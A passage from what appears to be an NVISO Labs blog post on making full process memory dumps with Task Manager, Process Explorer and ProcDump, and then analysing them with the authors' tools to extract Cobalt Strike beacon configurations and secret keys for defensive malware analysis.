Figure 8: Task Manager’s dialog after the completion of the process memory dump
Figure 9: the temporary folder containing the dump file (.DMP)

Sysinternals’ Process Explorer
Process Explorer can make process memory dumps, just like Task Manager. Select the process hosting the beacon, right-click and select “Create Dump / Create Full Dump“.

Figure 10: using Process Explorer to create a full process memory dump

Do not select “Create Minidump”, as a process memory dump created with this option, does not contain process memory.

With Process Explorer, you can select the location to save the dump:

Figure 12: with Process Explorer, you can choose the location to save the dump file

Sysinternals’ ProcDump
ProcDump is a tool to create process memory dumps from the command-line. You provide it with a process name or process ID, and it creates a dump. Make sure to use option -ma to create a full process memory dump, otherwise the dump will not contain process memory.

Figure 12: using procdump to create a full process memory dump


With ProcDump, the dump is written to the current directory.

Using process memory dumps
Just like with full system memory dumps, tool 1768.py can be used to analyze process memory dumps and to extract the beacon configuration.
As explained in part 3 of this series, tool cs-extract-key.py can be used to extract the secret keys from process memory dumps.
And if the secret keys are obfuscated, tool cs-analyze-processdump.py can be used to try to defeat the obfuscation, as explained in part 4 of this series.

Conclusion
Memory dumps can be used to detect and analyze beacons.
We developed tools to extract the beacon configuration and the secret keys from memory dumps.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

❌